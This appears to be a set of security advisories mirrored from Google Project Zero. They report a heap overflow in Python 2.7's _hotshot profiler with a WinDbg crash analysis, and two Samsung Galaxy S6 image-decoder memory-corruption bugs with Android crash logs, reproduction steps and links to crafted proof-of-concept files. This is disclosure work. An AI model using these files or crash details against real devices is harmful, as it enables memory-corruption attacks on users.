075dcb95 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcba5 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:000> !heap -p -a edi
address 075d9000 found in
_DPH_HEAP_ROOT @ 6ca1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
722809c: 75d67c8 2838 - 75d6000 4000
6c3194ec verifier!AVrfDebugPageHeapAllocate+0x0000023c
77a257b7 ntdll!RtlDebugAllocateHeap+0x0000003c
779c77ce ntdll!RtlpAllocateHeap+0x0004665a
77981134 ntdll!RtlAllocateHeap+0x0000014d
6c2c3db8 MSVCR90!malloc+0x00000079 [f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.c @ 163]
1e0ae6d1 python27!PyObject_Malloc+0x00000161 [c:\build27\cpython\objects\obmalloc.c @ 968]
0:000> !heap -p -a esi
address 075dcb35 found in
_DPH_HEAP_ROOT @ 6ca1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
7228068: 75da300 fd00 - 75da000 11000
6c3194ec verifier!AVrfDebugPageHeapAllocate+0x0000023c
77a257b7 ntdll!RtlDebugAllocateHeap+0x0000003c
779c77ce ntdll!RtlpAllocateHeap+0x0004665a
77981134 ntdll!RtlAllocateHeap+0x0000014d
6c2c3db8 MSVCR90!malloc+0x00000079 [f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.c @ 163]
1e0ae6d1 python27!PyObject_Malloc+0x00000161 [c:\build27\cpython\objects\obmalloc.c @ 968]
0:000> k4
ChildEBP RetAddr
0027fc80 1e008380 MSVCR90!LeadUpVec+0x70 [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 289]
0027fc90 1e008407 python27!pack_string+0x40 [c:\build27\cpython\modules\_hotshot.c @ 634]
0027fca8 1e0089bb python27!pack_add_info+0x77 [c:\build27\cpython\modules\_hotshot.c @ 652]
0027fcc0 1e0aafd7 python27!profiler_addinfo+0x5b [c:\build27\cpython\modules\_hotshot.c @ 1020]
0:000> .frame 1
01 0027fc90 1e008407 python27!pack_string+0x40 [c:\build27\cpython\modules\_hotshot.c @ 634]
0:000> dV
self = 0x075dcb35
s = 0x075da314 "AAAAAAAAAAAAAAAAAAA[...]AA..."
len = 0n123572224
0:000> dt self
Local var @ esi Type ProfilerObject*
+0x000 ob_refcnt : 0n1094795585
+0x004 ob_type : 0x41414141 _typeobject
+0x008 filemap : 0x41414141 _object
+0x00c logfilename : 0x41414141 _object
+0x010 index : 0n1094795585
+0x014 buffer : [10240] "AAAAAAAAAAAAAAAAAAA[...]AA..."
+0x2814 logfp : 0x41414141 _iobuf
+0x2818 lineevents : 0n1094795585
+0x281c linetimings : 0n1094795585
+0x2820 frametimings : 0n1094795585
+0x2824 active : 0n1094795585
+0x2828 next_fileno : 0n1094795585
+0x2830 prev_timeofday : 0n4702111234474983745
0:000> !analyze -v -nodb
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
MSVCR90!LeadUpVec+70 [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 289]
6c29af1c f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 6c29af1c (MSVCR90!LeadUpVec+0x00000070)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 075d9000
Attempt to write to address 075d9000
CONTEXT: 00000000 -- (.cxr 0x0;r)
eax=00000041 ebx=0000fceb ecx=00003532 edx=00000002 esi=075dcb35 edi=075d9000
eip=6c29af1c esp=0027fc78 ebp=0027fc80 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSVCR90!LeadUpVec+0x70:
6c29af1c f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
FAULTING_THREAD: 000013b0
PROCESS_NAME: pythonw.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
EXCEPTION_PARAMETER1: 00000001
EXCEPTION_PARAMETER2: 075d9000
WRITE_ADDRESS: 075d9000
FOLLOWUP_IP:
MSVCR90!LeadUpVec+70 [f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm @ 289]
6c29af1c f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
NTGLOBALFLAG: 2000000
APPLICATION_VERIFIER_FLAGS: 0
APP: pythonw.exe
ANALYSIS_VERSION: 6.3.9600.17029 (debuggers(dbg).140219-1702) x86fre
BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_NXCODE
PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_NXCODE
DEFAULT_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_NXCODE
LAST_CONTROL_TRANSFER: from 1e008380 to 6c29af1c
STACK_TEXT:
0027fc80 1e008380 075d67df 075da314 0000fceb MSVCR90!LeadUpVec+0x70
0027fc90 1e008407 075da314 1e008960 00000000 python27!pack_string+0x40
0027fca8 1e0089bb 072e67b4 075da314 0769e788 python27!pack_add_info+0x77
0027fcc0 1e0aafd7 075d67c8 071aabc0 0769e788 python27!profiler_addinfo+0x5b
0027fcd8 1e0edd10 0769e788 071aabc0 00000000 python27!PyCFunction_Call+0x47
0027fd04 1e0f017a 0027fd5c 06d57b18 06d57b18 python27!call_function+0x2b0
0027fd74 1e0f1150 071a9870 00000000 06d57b18 python27!PyEval_EvalFrameEx+0x239a
0027fda8 1e0f11b2 06d57b18 071a9870 06d5ba50 python27!PyEval_EvalCodeEx+0x690
0027fdd4 1e11707a 06d57b18 06d5ba50 06d5ba50 python27!PyEval_EvalCode+0x22
0027fdec 1e1181c5 0722e260 06d5ba50 06d5ba50 python27!run_mod+0x2a
0027fe0c 1e118760 6c2f7408 06d17fac 00000101 python27!PyRun_FileExFlags+0x75
0027fe4c 1e1190d9 6c2f7408 06d17fac 00000001 python27!PyRun_SimpleFileExFlags+0x190
0027fe68 1e038d35 6c2f7408 06d17fac 00000001 python27!PyRun_AnyFileExFlags+0x59
0027fee4 1d001017 00000002 06d17f88 1d0011b6 python27!Py_Main+0x965
0027fef0 1d0011b6 1d000000 00000000 04d3ffa8 pythonw!WinMain+0x17
0027ff80 76477c04 7ffde000 76477be0 63080f16 pythonw!__tmainCRTStartup+0x140
0027ff94 7799ad1f 7ffde000 62fa2f53 00000000 KERNEL32!BaseThreadInitThunk+0x24
0027ffdc 7799acea ffffffff 77980228 00000000 ntdll!__RtlUserThreadStart+0x2f
0027ffec 00000000 1d001395 7ffde000 00000000 ntdll!_RtlUserThreadStart+0x1b
STACK_COMMAND: .cxr 0x0 ; kb
FAULTING_SOURCE_LINE: f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm
FAULTING_SOURCE_FILE: f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm
FAULTING_SOURCE_LINE_NUMBER: 289
FAULTING_SOURCE_CODE:
No source found for 'f:\dd\vctools\crt_bld\SELF_X86\crt\src\INTEL\memcpy.asm'
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: msvcr90!LeadUpVec+70
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: MSVCR90
IMAGE_NAME: MSVCR90.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 51ea24a5
FAILURE_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_NXCODE_c0000005_MSVCR90.dll!LeadUpVec
BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_NXCODE_msvcr90!LeadUpVec+70
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:string_dereference_exploitable_fill_pattern_nxcode_c0000005_msvcr90.dll!leadupvec
FAILURE_ID_HASH: {006f2a1a-db5d-7798-544b-da0c2e0bcf19}
Followup: MachineOwner
---------
To fix the issue, pack_string should confirm that the fixed-length buffer is of sufficient size prior to performing the memcpy.
Source: https://code.google.com/p/google-security-research/issues/detail?id=497
Loading the bitmap bmp_memset.bmp can cause a crash due to a memset writing out of bounds.
I/DEBUG ( 2961): pid: 12383, tid: 12549, name: thread-pool-1 >>> com.sec.android.gallery3d <<<
I/DEBUG ( 2961): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89e84000
I/DEBUG ( 2961): x0 0000000089e8117c x1 00000000000000ff x2 00000000177fe13c x3 0000000089e8117c
I/DEBUG ( 2961): x4 0000000000000004 x5 0000007f65f42300 x6 0000000000000002 x7 ffffffffffffffff
I/DEBUG ( 2961): x8 0000000089e83ff0 x9 0000007f65f020b0 x10 000000000000003c x11 000000000000003b
I/DEBUG ( 2961): x12 0000007f65f02080 x13 00000000ffffffff x14 0000007f65f02080 x15 00000000000061e0
I/DEBUG ( 2961): x16 0000007f6baccc10 x17 0000007f958f8d80 x18 0000007f9596da40 x19 0000007f65f0e180
I/DEBUG ( 2961): x20 0000007f65f54020 x21 00000000002f0020 x22 0000000000000020 x23 0000000005e00400
I/DEBUG ( 2961): x24 0000000000000004 x25 0000007f65f42300 x26 0000000000000020 x27 0000007f65f52080
I/DEBUG ( 2961): x28 00000000000001da x29 0000000013071460 x30 0000007f6ba7e40c
I/DEBUG ( 2961): sp 0000007f66796130 pc 0000007f958f8e28 pstate 0000000020000000
I/DEBUG ( 2961):
I/DEBUG ( 2961): backtrace:
I/InjectionManager(12532): Inside getClassLibPath caller
I/DEBUG ( 2961): #00 pc 0000000000019e28 /system/lib64/libc.so (memset+168)
I/DEBUG ( 2961): #01 pc 0000000000030408 /system/lib64/libSecMMCodec.so (sbmpd_decode_rle_complete+64)
I/DEBUG ( 2961): #02 pc 0000000000033440 /system/lib64/libSecMMCodec.so (DecodeFile+120)
I/DEBUG ( 2961): #03 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG ( 2961): #04 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
To reproduce, download the file and open it in Gallery.
This issue was tested on a SM-G925V device running build number LRX22G.G925VVRU1AOE2.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38613.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=498
The attached jpg, upsample.jpg can cause memory corruption when media scanning occurs
F/libc ( 8600): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x206e6f69747562 in tid 8685 (HEAVY#0)
I/DEBUG ( 2956): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 2956): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.0.2/LRX22G/G925VVRU2AOF1:user/release-keys'
I/DEBUG ( 2956): Revision: '10'
I/DEBUG ( 2956): ABI: 'arm64'
I/DEBUG ( 2956): pid: 8600, tid: 8685, name: HEAVY#0 >>> com.samsung.dcm:DCMService <<<
I/DEBUG ( 2956): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x206e6f69747562
I/DEBUG ( 2956): x0 0000007f8cef2ab0 x1 0000000000000002 x2 0000007f8cef2ab0 x3 0000007f8ce5a390
I/DEBUG ( 2956): x4 0000007f8cef28d0 x5 3d206e6f69747562 x6 0000007f8cef29f0 x7 42e34ca342e32177
I/DEBUG ( 2956): x8 42e390a242e37199 x9 42dfe02f42debc0f x10 42e06c3442e03665 x11 42e0afd542e08c24
I/DEBUG ( 2956): x12 42e1070042e0e62d x13 42e1830842e146da x14 42e1f53342e1add4 x15 00000000000014a4
I/DEBUG ( 2956): x16 0000007f9f0d6ae0 x17 0000007fa3e7e880 x18 0000007f8ce75c60 x19 0000007f8cebe000
I/DEBUG ( 2956): x20 0000000000000001 x21 0000007f8cebe000 x22 0000000000000001 x23 0000000000000000
I/DEBUG ( 2956): x24 0000000000000000 x25 0000000000000000 x26 0000000010000000 x27 0000007f8c5ff050
I/DEBUG ( 2956): x28 0000007f8ce77800 x29 000000000000001c x30 0000007f9f09fff8
I/DEBUG ( 2956): sp 0000007f8d0fea20 pc 0000007f9f09e83c pstate 0000000080000000
I/DEBUG ( 2956):
I/DEBUG ( 2956): backtrace:
I/DEBUG ( 2956): #00 pc 000000000009b83c /system/lib64/libQjpeg.so (WINKJ_DoIntegralUpsample+164)
I/DEBUG ( 2956): #01 pc 000000000009cff4 /system/lib64/libQjpeg.so (WINKJ_SetupUpsample+228)
I/DEBUG ( 2956): #02 pc 0000000000035700 /system/lib64/libQjpeg.so (WINKJ_ProgProcessData+236)
I/DEBUG ( 2956): #03 pc 0000000000041f08 /system/lib64/libQjpeg.so (WINKJ_DecodeImage+688)
I/DEBUG ( 2956): #04 pc 00000000000428d4 /system/lib64/libQjpeg.so (WINKJ_DecodeFrame+88)
I/DEBUG ( 2956): #05 pc 0000000000042a08 /system/lib64/libQjpeg.so (QURAMWINK_DecodeJPEG+276)
I/DEBUG ( 2956): #06 pc 000000000004420c /system/lib64/libQjpeg.so (QURAMWINK_PDecodeJPEG+200)
I/DEBUG ( 2956): #07 pc 00000000000a4234 /system/lib64/libQjpeg.so (QjpgDecodeFileOpt+432)
I/DEBUG ( 2956): #08 pc 0000000000001b98 /system/lib64/libsaiv_codec.so (saiv_codec_JpegCodec_decode_f2bRotate+40)
I/DEBUG ( 2956): #09 pc 0000000000001418 /system/lib64/libsaiv_codec.so (Java_com_samsung_android_saiv_codec_JpegCodec_decodeF2BRotate+268)
I/DEBUG ( 2956): #10 pc 00000000000018ec /system/framework/arm64/saiv.odex
To reproduce, download the image file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38612.zip